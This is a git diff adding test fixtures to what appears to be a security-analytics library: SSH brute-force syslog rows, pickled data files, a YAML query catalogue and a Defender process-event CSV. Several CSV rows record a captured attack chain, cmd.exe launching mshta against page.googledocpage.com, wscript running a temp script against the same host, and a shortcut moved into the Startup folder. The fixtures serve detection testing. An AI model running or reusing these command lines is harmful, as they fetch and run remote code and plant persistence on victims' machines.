+19965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:18,UbuntuDevEnv,2019-06-06 18:18:17,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 56316:11: Normal Shutdown, Thank you for playing [preauth]",11553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,56316,,
+19966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:18,UbuntuDevEnv,2019-06-06 18:18:17,auth,UbuntuDevEnv,info,Disconnected from invalid user radio 128.199.149.61 port 56316 [preauth],11553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,128.199.149.6,56316,,
+19967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:24,UbuntuDevEnv,2019-06-06 18:18:24,auth,UbuntuDevEnv,info,Invalid user pat from 128.199.149.61 port 60946,11559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pat,128.199.149.6,60946,,
+19968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:25,UbuntuDevEnv,2019-06-06 18:18:24,auth,UbuntuDevEnv,info,Disconnected from invalid user pat 128.199.149.61 port 60946 [preauth],11559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pat,128.199.149.6,60946,,
+19969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:25,UbuntuDevEnv,2019-06-06 18:18:24,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 60946:11: Normal Shutdown, Thank you for playing [preauth]",11559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,60946,,
diff --git a/tests/testdata/linux_proc_test.pkl b/tests/testdata/linux_proc_test.pkl
new file mode 100644
index 000000000..293033f96
Binary files /dev/null and b/tests/testdata/linux_proc_test.pkl differ
diff --git a/tests/testdata/localdata/aad_logons.pkl b/tests/testdata/localdata/aad_logons.pkl
new file mode 100644
index 000000000..705833739
Binary files /dev/null and b/tests/testdata/localdata/aad_logons.pkl differ
diff --git a/tests/testdata/localdata/alerts_list.pkl b/tests/testdata/localdata/alerts_list.pkl
new file mode 100644
index 000000000..5f103ef8e
Binary files /dev/null and b/tests/testdata/localdata/alerts_list.pkl differ
diff --git a/tests/testdata/localdata/all_events_df.pkl b/tests/testdata/localdata/all_events_df.pkl
new file mode 100644
index 000000000..37989035a
Binary files /dev/null and b/tests/testdata/localdata/all_events_df.pkl differ
diff --git a/tests/testdata/localdata/az_net_comms_df.pkl b/tests/testdata/localdata/az_net_comms_df.pkl
new file mode 100644
index 000000000..c4cd03260
Binary files /dev/null and b/tests/testdata/localdata/az_net_comms_df.pkl differ
diff --git a/tests/testdata/localdata/az_whois.df.pkl b/tests/testdata/localdata/az_whois.df.pkl
new file mode 100644
index 000000000..da04eeb9a
Binary files /dev/null and b/tests/testdata/localdata/az_whois.df.pkl differ
diff --git a/tests/testdata/localdata/failed_logons.pkl b/tests/testdata/localdata/failed_logons.pkl
new file mode 100644
index 000000000..b85c5ce2b
Binary files /dev/null and b/tests/testdata/localdata/failed_logons.pkl differ
diff --git a/tests/testdata/localdata/host_logons.pkl b/tests/testdata/localdata/host_logons.pkl
new file mode 100644
index 000000000..9a4a2f424
Binary files /dev/null and b/tests/testdata/localdata/host_logons.pkl differ
diff --git a/tests/testdata/localdata/process_tree.pkl b/tests/testdata/localdata/process_tree.pkl
new file mode 100644
index 000000000..ef4aac758
Binary files /dev/null and b/tests/testdata/localdata/process_tree.pkl differ
diff --git a/tests/testdata/localdata/processes_on_host.pkl b/tests/testdata/localdata/processes_on_host.pkl
new file mode 100644
index 000000000..661a8dd36
Binary files /dev/null and b/tests/testdata/localdata/processes_on_host.pkl differ
diff --git a/tests/testdata/localdata/test_localdata_queries.yaml b/tests/testdata/localdata/test_localdata_queries.yaml
new file mode 100644
index 000000000..08df3c7d3
--- /dev/null
+++ b/tests/testdata/localdata/test_localdata_queries.yaml
@@ -0,0 +1,63 @@
+metadata:
+  version: 1
+  description: Local Data Alert Queries
+  data_environments: [LocalData]
+  data_families: [Heartbeat, WindowsSecurity, Network]
+  tags: ['alert', 'securityalert', 'process', 'account', 'network']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+sources:
+  host_heartbeat:
+    description: Retrieves heartbeat
+    metadata:
+      data_families: [Heartbeat]
+    args:
+      query: host_hb.csv
+    parameters:
+  linux_events:
+    description: List Linux Events
+    metadata:
+      data_families: [LinuxSyslog]
+    args:
+      query: linux_events.csv
+    parameters:
+  linux_logons:
+    description: List logons on host
+    metadata:
+      data_families: [LinuxSyslog]
+    args:
+      query: linux_logons.csv
+    parameters:
+  list_host_logons:
+    description: Retrieves the logon events on the host
+    args:
+      query: host_logons.pkl
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+  list_logons_by_account:
+    description: Retrieves the logon events for an account
+    args:
+      query: host_logons.pkl
+    parameters:
+      account_name:
+        description: The account name to find
+        type: str
+  list_azure_network_flows_by_ip:
+    description: Retrieves Azure network analytics flow events.
+    metadata:
+    args:
+      query: az_net_comms_df.pkl
+    parameters:
+      ip_address_list:
+        description: Column project statement
+        type: list
diff --git a/tests/testdata/mde_proc_cs1.csv b/tests/testdata/mde_proc_cs1.csv
new file mode 100644
index 000000000..3fc0ed55e
--- /dev/null
+++ b/tests/testdata/mde_proc_cs1.csv
@@ -0,0 +1,1567 @@
+,CreatedProcessIsElevated,CreatedProcessIntegrityLevel,CreatedProcessAccountSid,CreatedProcessAccountName,CreatedProcessAccountDomainName,CreatedProcessTokenElevationType,CreatedProcessFileMarkOfTheWeb,CreatedProcessCreationTime,CreatedProcessId,CreatedProcessName,CreatedProcessCommandLine,CreatedProcessFileType,CreatedProcessFileCreationTime,CreatedProcessFilePath,CreatedProcessFileSize,CreatedProcessFileMd5,CreatedProcessFileSha256,CreatedProcessFileSha1,InitiatingProcessImageMd5,InitiatingProcessImageSha256,InitiatingProcessImageSha1,InitiatingProcessAccountSid,InitiatingProcessAccountDomainName,InitiatingProcessAccountName,InitiatingProcessCreationTime,InitiatingProcessId,InitiatingProcessName,Process_CommandLine,IsElevatedProcess,InitiatingProcessParentCreationTime,InitiatingProcessParentProcessId,InitiatingProcessParentProcessName,InitiatingProcessIntegrityLevel,InitiatingProcessTokenElevationType,OrgId,MachineId,WcdMachineId,SenseMachineGuid,ReportTime,ReportArrivalTimeUtc,ReportGuid,ComputerDnsName,ReportIndex,IsLastInQuota,ClientVersion,IsTestOrg,InitiatingProcessStartKey,ContainerId,CreatedProcessStartKey,CreatedProcessReparentingProcessCreationTimeUtc,CreatedProcessReparentingProcessId,CreatedProcessParentCreationTimeUtc,CreatedProcessParentName,CreatedProcessParentId,CreatedProcessAttributes,InitiatingProcessSource,InitiatingProcessImageFilePath,InitiatingProcessImageFileSizeInBytes,InitiatingProcessImagePeTimestampUtc,InitiatingProcessImageLastWriteTimeUtc,InitiatingProcessImageLastAccessTimeUtc,InitiatingProcessImageCreationTimeUtc,InitiatingProcessAttributes,TruncationPolicy,RbacGroupId,OsVersionK,OsVersion,IsMalformed,InitiatingProcessAccountUpn,InitiatingProcessAccountAzureADId,CreatedProcessAccountUpn,CreatedProcessAccountAzureADId,IsMtpEnabled,TenantId,InitiatingProcessLogonId,LogonId,FirstSeen,InitiatingProcessShowWindow,InitiatingProcessStartupFlags,CreatedProcessShowWindow,CreatedProcessStartupFlags,InitiatingProcessCurrentWorkingDirectory,InitiatingProcessPosixProcessGroupId,InitiatingProcessPosixSessionId,InitiatingProcessPosixEffectiveUser,InitiatingProcessPosixEffectiveGroup,InitiatingProcessPosixAttachedTerminal,InitiatingProcessSignatureStatus,InitiatingProcessSignerType,CreatedProcessSignatureStatus,CreatedProcessSignerType,InitiatingProcessVersionInfoCompanyName,InitiatingProcessVersionInfoProductName,InitiatingProcessVersionInfoProductVersion,InitiatingProcessVersionInfoInternalFileName,InitiatingProcessVersionInfoOriginalFileName,InitiatingProcessVersionInfoFileDescription,CreatedProcessVersionInfoCompanyName,CreatedProcessVersionInfoProductName,CreatedProcessVersionInfoProductVersion,CreatedProcessVersionInfoInternalFileName,CreatedProcessVersionInfoOriginalFileName,CreatedProcessVersionInfoFileDescription
+0,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:14.159814200+00:00,17132,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:14.146601200+00:00,6844,cmd.exe,"""cmd.exe"" /c start /b mshta https://page.googledocpage.com/zOBOvBYm550gShsdwEAKoJUi95+jr4jqgNQ/2N18Q7Y=",False,2021-06-23 03:08:00.312815800+00:00,9016,\Device\HarddiskVolume3\Program Files\WinRAR\WinRAR.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:14.337028300+00:00,2021-06-23 03:10:43.816796700+00:00,d9962776-162a-4eed-9f70-18af60033a79,computerpii_0a470890c60768167990033d701e7bd881398861,160854,False,10.7740.19041.1052,False,11540474045172975,,11540474045172976,2021-06-23 03:08:14.146601200+00:00,6844,2021-06-23 03:08:14.146601200+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,6844,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,2049.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:14.269528900+00:00,7948,mshta.exe,mshta  https://page.googledocpage.com/zOBOvBYm550gShsdwEAKoJUi95+jr4jqgNQ/2N18Q7Y=,PortableExecutable,2019-12-07 09:09:39.756421400+00:00,C:\Windows\System32\mshta.exe,14848,0b4340ed812dc82ce636c00fa5c9bef2,dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895,51c97ebe601ef079b16bcd87af827b0be5283d96,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:14.146601200+00:00,6844,cmd.exe,"""cmd.exe"" /c start /b mshta https://page.googledocpage.com/zOBOvBYm550gShsdwEAKoJUi95+jr4jqgNQ/2N18Q7Y=",False,2021-06-23 03:08:00.312815800+00:00,9016,\Device\HarddiskVolume3\Program Files\WinRAR\WinRAR.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:14.344200200+00:00,2021-06-23 03:10:43.816929500+00:00,29af3c7b-2214-4059-8826-cbacdd5ee621,computerpii_0a470890c60768167990033d701e7bd881398861,160855,False,10.7740.19041.1052,False,11540474045172975,,11540474045172977,2021-06-23 03:08:14.146601200+00:00,6844,2021-06-23 03:08:14.146601200+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,6844,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,2049.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Internet Explorer,11.00.19041.1,MSHTA.EXE,MSHTA.EXE,Microsoft (R) HTML Application host
+2,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:15.771405100+00:00,15864,SecurityHealthHost.exe,SecurityHealthHost.exe {08728914-3F57-4D52-9E31-49DAECA5A80A} -Embedding,PortableExecutable,2021-05-12 01:12:35.767997400+00:00,C:\Windows\System32\SecurityHealthHost.exe,98120,76a2df6d331bca4a01715c369ab81603,4a56edeb0f1b6ede1d1b292dad034757da7f481435ae12c50482086d82a78904,89fb1c4fb8f0b648acccd946798647f7b2a84aeb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:16.060565800+00:00,2021-06-23 03:10:43.817172200+00:00,5c43f9b6-40af-46e2-8f6a-f4dd872111f3,computerpii_0a470890c60768167990033d701e7bd881398861,160860,False,10.7740.19041.1052,False,11540474045136908,,11540474045172978,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.1907.16384,SecurityHealthHost,SecurityHealthHost.exe,Windows Security Health Host
+3,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:19.706194400+00:00,14800,explorer.exe,"""explorer.exe"" ""https://drive.google.com/file/d/1TDk3O5c-rObQ4pO6LmitCFduw1OqW1SK/view""",PortableExecutable,2021-06-09 01:20:37.358875500+00:00,C:\Windows\explorer.exe,4891752,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,0b4340ed812dc82ce636c00fa5c9bef2,dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895,51c97ebe601ef079b16bcd87af827b0be5283d96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:14.269528900+00:00,7948,mshta.exe,mshta  https://page.googledocpage.com/zOBOvBYm550gShsdwEAKoJUi95+jr4jqgNQ/2N18Q7Y=,False,2021-06-23 03:08:14.146601200+00:00,6844,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:19.736267200+00:00,2021-06-23 03:10:43.817458+00:00,8f25753f-886c-4444-b04f-44538c235d8e,computerpii_0a470890c60768167990033d701e7bd881398861,160868,False,10.7740.19041.1052,False,11540474045172977,,11540474045172979,2021-06-23 03:08:14.269528900+00:00,7948,2021-06-23 03:08:14.269528900+00:00,\Device\HarddiskVolume3\Windows\System32\mshta.exe,7948,128,ActiveProcessStartkey,C:\Windows\System32,14848,1979-10-11 17:42:52+00:00,2019-12-07 09:09:39.756421400+00:00,2021-06-23 03:08:14.284310800+00:00,2019-12-07 09:09:39.756421400+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,MSHTA.EXE,MSHTA.EXE,Microsoft (R) HTML Application host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer
+4,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:19.770401500+00:00,20156,explorer.exe,"explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",PortableExecutable,2021-06-09 01:20:37.358875500+00:00,C:\Windows\explorer.exe,4891752,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:19.812427300+00:00,2021-06-23 03:10:43.817787+00:00,74e7ba7e-d238-4b19-9573-d3d0f9d7b36d,computerpii_0a470890c60768167990033d701e7bd881398861,160875,False,10.7740.19041.1052,False,11540474045136908,,11540474045172981,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,20608.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer
+5,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:19.930804700+00:00,19856,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 2 & move ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_d143d4ad31fa3d7d15a5fb448bcdb779cf11429b.lnk"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,0b4340ed812dc82ce636c00fa5c9bef2,dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895,51c97ebe601ef079b16bcd87af827b0be5283d96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:14.269528900+00:00,7948,mshta.exe,mshta  https://page.googledocpage.com/zOBOvBYm550gShsdwEAKoJUi95+jr4jqgNQ/2N18Q7Y=,False,2021-06-23 03:08:14.146601200+00:00,6844,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:20.164016900+00:00,2021-06-23 03:10:43.817929400+00:00,7e5af699-261a-4f4f-8315-9e72eff3cdcc,computerpii_0a470890c60768167990033d701e7bd881398861,160878,False,10.7740.19041.1052,False,11540474045172977,,11540474045172982,2021-06-23 03:08:14.269528900+00:00,7948,2021-06-23 03:08:14.269528900+00:00,\Device\HarddiskVolume3\Windows\System32\mshta.exe,7948,18560,TerminateProcessStartkey,C:\Windows\System32,14848,1979-10-11 17:42:52+00:00,2019-12-07 09:09:39.756421400+00:00,2021-06-23 03:08:14.284310800+00:00,2019-12-07 09:09:39.756421400+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,MSHTA.EXE,MSHTA.EXE,Microsoft (R) HTML Application host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+6,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:19.936127900+00:00,5924,msedge.exe,"""msedge.exe"" --single-argument https://drive.google.com/file/d/1TDk3O5c-rObQ4pO6LmitCFduw1OqW1SK/view",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:19.770401500+00:00,20156,explorer.exe,"explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",False,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:20.165564700+00:00,2021-06-23 03:10:43.817976300+00:00,4e9668b2-cb43-415a-bb1d-96a6da93f993,computerpii_0a470890c60768167990033d701e7bd881398861,160879,False,10.7740.19041.1052,False,11540474045172981,,11540474045172983,2021-06-23 03:08:19.770401500+00:00,20156,2021-06-23 03:08:19.770401500+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,20156,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 03:08:19.709179500+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,20608.0,10.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
